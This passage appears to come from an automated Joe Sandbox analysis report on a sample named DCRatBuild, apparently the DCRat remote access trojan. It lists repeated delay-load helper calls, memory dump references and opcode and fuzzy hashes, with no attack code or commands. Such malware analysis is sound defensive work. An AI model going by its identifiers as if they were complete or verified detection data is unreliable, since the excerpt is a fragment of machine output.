                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: ddfd1637e0c781a85ff400d2b926c9127d77548f10d4b976e990d881a56b89de
                      • Instruction ID: abd5154eb1e5548aa04dce0be0428ec3a944ee08fc25e9a8e47234088a1d87db
                      • Opcode Fuzzy Hash: ddfd1637e0c781a85ff400d2b926c9127d77548f10d4b976e990d881a56b89de
                      • Instruction Fuzzy Hash: 2BB012A126C2026C324871047D03E36162DCCC0B20331C11FF08FD12C0F4409C484432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                      • Instruction ID: b96fd5a7f21dfa1979fd2f99a04b456529428e819934c253f74d15c9578c5aac
                      • Opcode Fuzzy Hash: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                      • Instruction Fuzzy Hash: 07B0929526C3026C260821406952D3B1629CC80B20321852EB04EA0180A4409C488432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                      • Instruction ID: 1aa383e5ba1583b737f6d686500e1192c5f2bc71b158ffc437c744dae50fd8df
                      • Opcode Fuzzy Hash: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                      • Instruction Fuzzy Hash: 8DB0129126C2026C320875047D03E36162DCCC1B20330C02FF44FD13C0F4409C0D4432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                      • Instruction ID: ed04698555ac8498363a9f36f00b6475b9730dcf226ca70eb29901dcf4e718dc
                      • Opcode Fuzzy Hash: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                      • Instruction Fuzzy Hash: 79B012D526C2026C320871447D43E3B162DDCC0B20330C01FF04FD12C0F8409C084532
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7E20B
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                      • Instruction ID: 170700ec1c2ed0b0a8fc870c739cbf6857911aeea6bd4cc45b7aae29dc580525
                      • Opcode Fuzzy Hash: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                      • Instruction Fuzzy Hash: A2B012D126E0027D330C11007F07E36032CCCC0B60330C01FF10ED4081B5808D095032
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                      • Instruction ID: 5dbc42b1651a11e6094f917cce065cd6688fbb72237c0aacbb0f3dbbc3b22480
                      • Opcode Fuzzy Hash: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                      • Instruction Fuzzy Hash: 62B012E126C1026C320D71057E03E3616BDCCC0B20330C01FF04FD12C0F4809C094432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                      • Instruction ID: 648a6bee2e9b95081b5a03cb6fa027a41c7734b59f722e6b19be2b353195a887
                      • Opcode Fuzzy Hash: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                      • Instruction Fuzzy Hash: E1B012A126D6026C324872047D03E36162FCCC0B20331C11FF04FD12C0F440DC484432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                      • Instruction ID: 8d776ac90ff0905748a87bfc75feb013670f7c19dc6288f3508f7098a24ab319
                      • Opcode Fuzzy Hash: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                      • Instruction Fuzzy Hash: 20B012912AD6026C320871047D03E36162FCCC1B20330C01FF44FD12C0F4409C084432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                      • Instruction ID: 9838c794a9f57ae96aca407e6f504d79c79cdb00d7d181d130788accd0cc9a3d
                      • Opcode Fuzzy Hash: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                      • Instruction Fuzzy Hash: BBB0129127D9026C320871047D03E36166FCCC0B20330C01FF04FD12C0F8409C084432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                      • Instruction ID: 3fd5b8ec4894a76c71e7afb97dad15f6bd798fe83a0568a2a7fde65c2e4fb5f3
                      • Opcode Fuzzy Hash: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                      • Instruction Fuzzy Hash: CEB0129126C2026C320971147D03E36167DCCC1B20331C01FF54FD12C0F5409C084432
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                      • Instruction ID: 425e4f52d10ea182e07de1c16309ecb5b4fa23cb50dce7c9309f15b5f80057fb
                      • Opcode Fuzzy Hash: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                      • Instruction Fuzzy Hash: 6FB0129126C0026C320871057E03F3E126EDDC4B20330C52FF00FC1144F8448C0D5431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                      • Instruction ID: 791791de184434ea9fc46c0c34d5796cfc70be29561b95e828bb9700e74d8e60
                      • Opcode Fuzzy Hash: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                      • Instruction Fuzzy Hash: 95B012A226C102AC32087105BE03E3A126DCDC0B20330C11FF44FC1144F4488C085431
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                      • Instruction ID: b5fa89fa7e3a18d9eb34c023e6a550f154ff33004e222bedece224773f1b39ea
                      • Opcode Fuzzy Hash: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                      • Instruction Fuzzy Hash: 3DB0929526C0026D220861142907E36223ED880B20321802FB00EC1140A9408C099031
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                      • Instruction ID: edf5d0a094b3638d0fd460bbf4c3e91741024b17bf8aab8398e6d8b9aee3ef46
                      • Opcode Fuzzy Hash: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                      • Instruction Fuzzy Hash: 50B0929526C1066D220811002D07D36223ED880B20321822FB00E90040A9408C489031
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                      • Instruction ID: 4025da67312c593f7d381bd3aa07bfa54e7a3d79a4c5df0a5cae3ad06867dfb4
                      • Opcode Fuzzy Hash: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                      • Instruction Fuzzy Hash: 94B0129536C0436D320C51043E07E37233ECCC0B20331C11FF10EC1140F9808C099031
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 0f942bd0ca81b08466cc7394859f2a85500f60751a27a878bf86da9091b0caaf
                      • Instruction ID: df98ce7c7fe28b317bbb8092579870707dddb0d41890c3d233e0347f22d00cec
                      • Opcode Fuzzy Hash: 0f942bd0ca81b08466cc7394859f2a85500f60751a27a878bf86da9091b0caaf
                      • Instruction Fuzzy Hash: A8B0129536C103AD320C51043D07E37223ECCC0B20331C11FF40EC2140F9408C0C9031
                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                        • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                        • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                       • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                      • String ID:
                      • API String ID: 1269201914-0
                      • Opcode ID: 9863f028ad79830540f4b15ab7d7e98ef159e9a56a2ef8cffc2263b8913e3b77
